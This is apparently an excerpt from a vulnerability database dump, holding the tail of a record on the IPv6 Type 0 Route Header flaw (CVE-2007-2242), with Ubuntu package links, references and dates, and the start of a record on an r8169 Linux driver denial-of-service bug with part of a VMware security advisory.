      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64_2.6.15-29.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-server_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-xeon_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64_2.6.15-29.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc-smp_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-386_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.58.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3104"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-k8_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0504"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server-bigiron_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-xeon_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1496"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1496"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5755"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5755"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1861"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3513"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3513"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3848"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "PACKETSTORM",
        "id": "60879"
      },
      {
        "db": "PACKETSTORM",
        "id": "56342"
      },
      {
        "db": "PACKETSTORM",
        "id": "57864"
      },
      {
        "db": "PACKETSTORM",
        "id": "58999"
      },
      {
        "db": "PACKETSTORM",
        "id": "58920"
      },
      {
        "db": "PACKETSTORM",
        "id": "60130"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "PACKETSTORM",
        "id": "60879"
      },
      {
        "db": "PACKETSTORM",
        "id": "56342"
      },
      {
        "db": "PACKETSTORM",
        "id": "57864"
      },
      {
        "db": "PACKETSTORM",
        "id": "58999"
      },
      {
        "db": "PACKETSTORM",
        "id": "58920"
      },
      {
        "db": "PACKETSTORM",
        "id": "60130"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-06-01T00:00:00",
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "date": "2007-04-23T00:00:00",
        "db": "BID",
        "id": "23615"
      },
      {
        "date": "2007-06-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "date": "2007-11-14T02:03:01",
        "db": "PACKETSTORM",
        "id": "60879"
      },
      {
        "date": "2007-05-03T00:13:35",
        "db": "PACKETSTORM",
        "id": "56342"
      },
      {
        "date": "2007-07-19T05:10:35",
        "db": "PACKETSTORM",
        "id": "57864"
      },
      {
        "date": "2007-09-01T03:53:01",
        "db": "PACKETSTORM",
        "id": "58999"
      },
      {
        "date": "2007-08-29T04:36:35",
        "db": "PACKETSTORM",
        "id": "58920"
      },
      {
        "date": "2007-10-16T04:22:46",
        "db": "PACKETSTORM",
        "id": "60130"
      },
      {
        "date": "2007-04-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "date": "2007-04-25T16:19:00",
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-07-22T00:00:00",
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "date": "2008-02-08T14:46:00",
        "db": "BID",
        "id": "23615"
      },
      {
        "date": "2007-11-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "date": "2007-04-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "date": "2018-10-16T16:42:44.680000",
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IPv6 Type 0 Route Headers allow sender to control routing",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      }
    ],
    "trust": 0.9
  }
}

var-200906-0593
Vulnerability from variot

drivers/net/r8169.c in the r8169 driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to (1) cause a denial of service (temporary network outage) via a packet with a crafted size, in conjunction with certain packets containing A characters and certain packets containing E characters; or (2) cause a denial of service (system crash) via a packet with a crafted size, in conjunction with certain packets containing '\0' characters, related to the value of the status register and erroneous behavior associated with the RxMaxSize register. NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-1389. Linux kernel of r8169 The driver MTU Service operation disruption due to incomplete processing of Ethernet frames exceeding (DoS) There is a vulnerability that becomes a condition.Service operation disruption to a third party (DoS) There is a possibility of being put into a state. The Linux Kernel is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to deny service to legitimate users; other attacks are also possible. The following are vulnerable: Linux kernel prior to 2.6.12 Linux Kernel 2.6.30 and later. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is related to the wrong behavior of the value of the status register and the RxMaxSize register. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2010-0009 Synopsis: ESXi ntp and ESX Service Console third party updates Issue date: 2010-05-27 Updated on: 2010-05-27 (initial release of advisory) CVE numbers: CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910 CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141 CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409 CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384 CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001 CVE-2010-0426 CVE-2010-0427 CVE-2010-0382


  1. Summary

ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo.

  1. Relevant releases

VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG

  1. Problem Description

a. Service Console update for COS kernel

Updated COS package "kernel" addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

